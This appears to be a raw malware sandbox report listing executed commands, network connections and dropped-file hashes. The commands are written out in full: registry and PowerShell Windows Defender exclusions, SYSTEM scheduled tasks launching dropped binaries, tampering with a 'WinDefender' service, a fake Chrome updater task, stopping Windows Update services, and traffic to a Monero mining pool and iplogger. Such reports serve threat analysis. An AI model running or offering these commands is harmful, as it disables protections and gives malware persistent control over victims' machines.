C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 01:32:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\kgFuKZt.exe\" KS /UHsite_idVKq 385119 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\kgFuKZt.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\kgFuKZt.exe KS /UHsite_idVKq 385119 /S

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\PolSSB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\qKHTawO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\uwsqhiX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\iGQooQD.xml" /RU "SYSTEM"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\SoSbSXm.xml" /RU "SYSTEM"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\TktfNBv.xml" /RU "SYSTEM"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 03:04:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\pgiklxWn\WrXTePt.dll\",#1 /TJsite_idcoE 385119" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\pgiklxWn\WrXTePt.dll",#1 /TJsite_idcoE 385119

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\pgiklxWn\WrXTePt.dll",#1 /TJsite_idcoE 385119

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1833031203137367634-1257320705-1093044858-590289009-190986622-985419766-1713115932"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 www.facebook.com udp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
RU 85.209.11.85:41140 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
DE 148.251.234.93:443 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
DE 148.251.234.93:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
US 204.79.197.200:443 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 710f3e3f-2a39-42cb-8e91-c16846a715d9.uuid.allstatsin.ru udp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 148.251.234.93:443 tcp
NL 194.169.175.235:42691 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 server1.allstatsin.ru udp
US 8.8.8.8:53 stun4.l.google.com udp
BG 185.82.216.104:443 server1.allstatsin.ru tcp
US 74.125.204.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.1:443 walkinglate.com tcp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 3.80.150.121:443 service-domain.xyz tcp
US 3.80.150.121:443 service-domain.xyz tcp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 clients2.google.com udp
NL 172.217.168.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
DE 148.251.234.93:443 tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 server1.allstatsin.ru udp
DE 148.251.234.93:443 tcp
BG 185.82.216.104:443 server1.allstatsin.ru tcp
US 8.8.8.8:53 api3.check-data.xyz udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 tcp
US 35.81.204.150:80 api3.check-data.xyz tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 datasheet.fun udp
DE 148.251.234.93:443 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
DE 148.251.234.93:443 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
BG 185.82.216.104:443 server1.allstatsin.ru tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
FR 51.159.66.125:53 eotfvmb.ua udp
BG 185.141.63.172:80 eotfvmb.ua tcp
SE 142.250.74.46:443 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 142.251.125.127:19302 stun1.l.google.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp

Files

memory/2976-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2976-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1380-1-0x0000000002990000-0x00000000029A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DDD1.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\DDD1.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\DEFB.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

\Users\Admin\AppData\Local\Temp\DDD1.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\DFB7.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
